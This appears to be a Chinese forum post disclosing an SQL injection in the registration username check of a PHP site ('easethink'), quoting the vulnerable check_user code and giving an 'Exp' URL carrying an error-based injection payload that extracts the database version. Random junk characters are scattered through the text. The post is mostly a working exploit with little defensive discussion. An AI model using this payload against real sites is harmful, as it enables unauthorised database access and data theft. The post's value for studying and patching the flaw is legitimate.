在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php。很多程序多会忽略这个导致存在SQL注入。
' T" F& B, t* a: b7 y
/ L8 x( V6 ^$ ?& W
$ h5 u. C" x* N, @& V- L' P1 A/ |. o
* 验证会员数据 */ function check_user($field_name,$field_data) { //开始数据验证 $user_data[$field_name] = $field_data; $res = array('status'=>1,'info'=>'','data'=>''); //用于返回的数据 if(trim($user_data['user_name'])==''&&$field_name=='user_name') { $field_item['field_name'] = 'user_name'; $field_item['error'] = EMPTY_ERROR; $res['status'] = 0; $res['data'] = $field_item; return $res; } if($field_name=='user_name'&&$GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."user where user_name = '".trim($user_data['user_name'])."' and id <> ".intval($user_data['id']))>0)//这里的$user_data['user_name']的值就是用户名提交过来的值,这里只是过滤了空格。所有存在SQL注入漏洞。 { $field_item['field_name'] = 'user_name'; $field_item['error'] = EXIST_ERROR; $res['status'] = 0; $res['data'] = $field_item; return $res; }
) `, C1 L7 f1 I9 _+ }* t5 r" }6 [$ \5 f/ L
1 g- B: c/ j/ q" j* M: {
7 P1 [6 V5 ?% L+ Q; z9 q) c4 OExp:1 j/ t6 }0 D% |2 @6 O
m: @% P$ X0 B7 }6 s# y. f
+ q5 F" T1 N8 [- x9 X, G( Q
6 h7 a7 ?; N( I1 U8 i4 ihttp://192.168.9.109/easethink_f ... ame&field_data=**/(select/**/1/**/from/**/(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23 $ r" T4 z \/ {
7 j" Z1 K$ ~* }9 N8 w: s; ~) W |